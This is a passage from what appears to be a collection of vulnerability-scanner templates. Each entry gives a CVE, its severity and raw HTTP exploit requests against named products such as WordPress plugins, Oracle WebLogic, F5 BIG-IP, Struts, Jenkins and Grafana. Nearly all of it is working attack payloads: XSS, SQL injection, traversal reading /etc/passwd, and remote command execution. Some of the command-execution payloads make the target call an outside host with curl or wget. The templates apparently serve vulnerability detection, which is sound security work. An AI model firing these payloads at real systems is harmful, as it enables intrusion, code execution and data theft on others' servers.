name=\"date[time]\"\n\n21:49:36\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"comment\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryWEcZgRB4detkrGaY--\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-25216","info":{"name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44946","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0437","info":{"name":"karma-runner DOM-based Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/karma.js","{{BaseURL}}/?return_url=javascript:alert(document.domain)"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 6.3.14')"]},{"type":"word","part":"body_2","words":["Karma"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)VERSION: '([0-9.]+)'"],"internal":true}]}]},{"id":"CVE-2022-46073","info":{"name":"Helmet Store Showroom - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Helmet Store Showroom\")","contains(body, \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0826","info":{"name":"WordPress WP Video Gallery <=1.7.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Registred videos :\")"],"condition":"and"}]}]},{"id":"CVE-2022-0434","info":{"name":"WordPress Page Views Count <2.4.15 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26159","info":{"name":"Ametys CMS Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auto-completion>","<item>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0535","info":{"name":"WordPress E2Pdf <1.16.45 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_nonce={{nonce}}&e2pdf_user_email=&e2pdf_api=api.e2pdf.com&e2pdf_connection_timeout=300&e2pdf_processor=0&e2pdf_dev_update=0&e2pdf_url_format=siteurl&e2pdf_mod_rewrite=0&e2pdf_mod_rewrite_url=e2pdf%2F%25uid%25%2F&e2pdf_cache=0&e2pdf_cache=1&e2pdf_cache_fonts=0&e2pdf_cache_fonts=1&e2pdf_debug=0&e2pdf_hide_warnings=0&e2pdf_images_remote_request=0&e2pdf_images_timeout=30&e2pdf_revisions_limit=3&e2pdf_memory_time=0&e2pdf_developer=0&e2pdf_developer_ips=%3C%2Ftextarea%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&submit=Save+Changes\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, 'placeholder=\\\"Developer IPs\\\" ></textarea><svg/onload=alert(document.domain)>')","contains(header_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-32409","info":{"name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25356","info":{"name":"Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception: Error while [Loading XML","&lt;RegKey&gt;","&lt;IsAdmin&gt;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31847","info":{"name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24990","info":{"name":"TerraMaster TOS < 4.2.30 Server Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/api.php?mobile/webNasIPS"],"headers":{"User-Agent":"TNAS"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","TerraMaster"],"condition":"and"},{"type":"regex","part":"body","regex":["webNasIPS successful","(ADDR|(IFC|PWD|[DS]AT)):","\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-1681","info":{"name":"Cherokee HTTPD <=0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-2842","info":{"name":"Squirrelmail <=1.4.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4556","info":{"name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.action"],"body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-5728","info":{"name":"phpPgAdmin <=4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","phpPgAdmin"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-0885","info":{"name":"Jira Rainbow.Zen - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4504","info":{"name":"Joomla! RSfiles <=1.0.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10549","info":{"name":"rConfig <=3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-4463","info":{"name":"IBM Maximo Asset Management Information Disclosure - XML External Entity Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/os/mxperson","{{BaseURL}}/meaweb/os/mxperson"],"body":"<?xml version='1.0' encoding='UTF-8'?>\n<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>\n  <max:MXPERSONQuery></max:MXPERSONQuery>\n</max:QueryMXPERSON>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["QueryMXPERSONResponse","MXPERSONSet"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2020-13927","info":{"name":"Airflow Experimental <1.10.11 - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/latest_runs"],"matchers":[{"type":"word","part":"body","words":["\"dag_run_url\":","\"dag_id\":","\"items\":"],"condition":"and"}]}]},{"id":"CVE-2020-11547","info":{"name":"PRTG Network Monitor <20.1.57.1745 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/login.htm?type=probes","{{BaseURL}}/public/login.htm?type=requests","{{BaseURL}}/public/login.htm?type=treestat"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"]},{"type":"word","part":"body","words":["prtg_network_monitor","Probes","Groups"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14750","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\ncmd: curl {{interactsh-url}}\nContent-Type: application/x-www-form-urlencoded\n\n_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\nfield.setAccessible(true);\nObject obj = field.get(adapter);\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\nString cmd = req.getHeader(\"cmd\");\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\nif (cmd != null) {\n    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n    res.getServletOutputStream().flush();\n    res.getWriter().write(\"\");\n}executeThread.interrupt();\n\");\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["ADMINCONSOLESESSION="]},{"type":"regex","part":"body","regex":["<html><head></head><body>(.*)</body></html>"]}]}]},{"id":"CVE-2020-8644","info":{"name":"playSMS <1.4.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nX-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4468-0202-EVC"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"csrf","internal":true,"xpath":["/html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input"],"attribute":"value","part":"body"}]}]},{"id":"CVE-2020-13379","info":{"name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cloudflare.com","dns"],"condition":"and"},{"type":"word","part":"header","words":["image/jpeg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2103","info":{"name":"Jenkins <=2.218 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","SessionId: null"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2020-8982","info":{"name":"Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12054","info":{"name":"WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(123);>","catch-breadcrumb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28208","info":{"name":"Rocket.Chat <3.9.1 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\\\":false","\"success\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12800","info":{"name":"WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\nX-Requested-With: XMLHttpRequest\n\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"supported_type\"\n\ntxt%\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"size_limit\"\n\n5242880\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\nContent-Type: application/x-httpd-php\n\nCVE-2020-12800-{{randstr}}\n-----------------------------350278735926454076983690555601--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2020-12800-{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26919","info":{"name":"NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nsubmitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-7209","info":{"name":"LinuxKI Toolset <= 6.01 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-17526","info":{"name":"Apache Airflow <1.10.14 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\nCookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Redirecting...')","status_code_1 == 302"],"condition":"and"},{"type":"word","part":"body_2","words":["DAG","Recent Tasks","Users","SLA Misses","Task Instances"],"condition":"and"}]}]},{"id":"CVE-2020-15050","info":{"name":"Suprema BioStar <2.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2020-10548","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24312","info":{"name":"WordPress Plugin File Manager (wp-file-manager) Backup Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of","wp-content/uploads/wp-file-manager-pro/fm_backup","backup_"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5902","info":{"name":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license","{{BaseURL}}/hsqldb%0a"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","BIG-IP release ([\\d.]+)","[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}","HSQL Database Engine Servlet"],"condition":"or"},{"type":"status","status":[200]}]},{"raw":["POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=create%20cli%20alias%20private%20list%20command%20bash\n","POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\nHost: {{Hostname}}\n\nfileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=list%20%2Ftmp%2Fnonexistent\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=delete%20cli%20alias%20private%20list\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["h3ll0_w0Rld"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14882","info":{"name":"Oracle Weblogic Server - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-20982","info":{"name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["location.href='</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22209","info":{"name":"74cms - ajax_common.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%\u9326%27%20union%20select%201,md5({{num}}),3%23%27"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-5775","info":{"name":"Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-19283","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15505","info":{"name":"MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mifs/.;/services/LogService HTTP/1.1\nHost: {{Hostname}}\nReferer: https://{{Hostname}}\nContent-Type: x-application/hessian\nConnection: close\n\n{{hex_decode('630200480004')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-hessian"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29395","info":{"name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1956","info":{"name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","severity":"high"},"requests":[{"raw":["POST /kylin/api/user/authentication HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n","POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-12447","info":{"name":"Onkyo TX-NR585 Web Interface - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16139","info":{"name":"Cisco Unified IP Conference Station 7937G - Denial-of-Service","severity":"high"},"requests":[{"raw":["POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","words":["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10199","info":{"name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /service/rapture/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{base64(username)}}&password={{base64(password)}}\n","POST /service/rest/beta/repositories/bower/group HTTP/1.1\nHost: {{Hostname}}\nNX-ANTI-CSRF-TOKEN: 1\nCookie: NX-ANTI-CSRF-TOKEN=1\nContent-Type: application/json\n\n{\"name\": \"internal\", \"online\": \"true\", \"storage\": 